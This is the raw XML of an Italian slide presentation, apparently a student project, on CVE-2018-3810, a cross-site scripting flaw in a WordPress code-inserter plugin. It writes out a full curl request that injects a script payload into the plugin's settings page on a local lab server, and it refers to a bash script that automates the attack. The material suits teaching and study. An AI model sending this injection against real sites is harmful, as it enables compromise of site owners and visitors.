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Defilippi" initials="LD" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="7b77288b1f6930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CVE-2018-3810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Presentazione ed exploit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97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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>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Tipo: cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Piattaforma attaccata: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> (attraverso il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Oturia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Smart Google Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Inserter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Versioni vulnerabili del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>: fino alla 3.4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0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pagina «incriminata» prima…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
            </a:b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1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1525853" y="2160589"/>
            <a:ext cx="6900332" cy="3773868"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28298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Attacco…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396427"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Attacco via script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>bash</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Esecuzione da terminale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> automatizza l’attacco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77334" y="3557016"/>
            <a:ext cx="9436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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -k -i --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -X POST -d "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sgcgoogleanalytic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&lt;script&gt;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alert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("1");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sgcwebtools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Save+Changes&amp;action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>savegooglecode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" "http://localhost:8080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin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</a:rPr>
              <a:t>wp-admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin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</a:rPr>
              <a:t>options-general.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>smartcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" -H "Host:localhost:8080" -H "Content-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/x-www-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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265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Attacco nel dettaglio (parti salienti)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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>: riporta il contenuto di una pagina web passata come parametro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-X POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: specifica del metodo della pagina → Non necessaria</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: codice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> iniettato</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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2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pagina «incriminata» dopo…	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8" b="12430"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1343152"/>
            <a:ext cx="8825155" cy="4895231"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Ovale 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481328" y="2752344"/>
            <a:ext cx="1261872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Macchina virtuale Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>mint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> 18.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>LAMP 7.1.15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> 4.9.4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Oturia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>smart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>inserter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927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Ricapitolando… la cronologia dell’attacco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341563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Esecuzione del comando da terminale → Attacco effettuato, per visualizzarlo…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Aprire il browser web alla pagina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60" y="3199856"/>
            <a:ext cx="2841506" cy="284150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22960" y="3785616"/>
            <a:ext cx="737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Oppure… Lanciare il file progettoWebSec.sh, penserà a tutto lui!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7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Grazie per l’attenzione!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2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197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Wingdings 3</vt:lpstr>
      <vt:lpstr>Sfaccettatura</vt:lpstr>
      <vt:lpstr>CVE-2018-3810</vt:lpstr>
      <vt:lpstr>Descrizione  </vt:lpstr>
      <vt:lpstr>La pagina «incriminata» prima… </vt:lpstr>
      <vt:lpstr>Attacco…</vt:lpstr>
      <vt:lpstr>Attacco nel dettaglio (parti salienti)</vt:lpstr>
      <vt:lpstr>La pagina «incriminata» dopo… </vt:lpstr>
      <vt:lpstr>Sviluppo</vt:lpstr>
      <vt:lpstr>Ricapitolando… la cronologia dell’attacco</vt:lpstr>
      <vt:lpstr>Fine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CVE-2018-</dc:title>
  <dc:creator>Luca Defilippi</dc:creator>
  <cp:lastModifiedBy>Luca Defilippi</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-20T15:44:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-29T13:29:49Z</dcterms:modified>
</cp:coreProperties>
</file>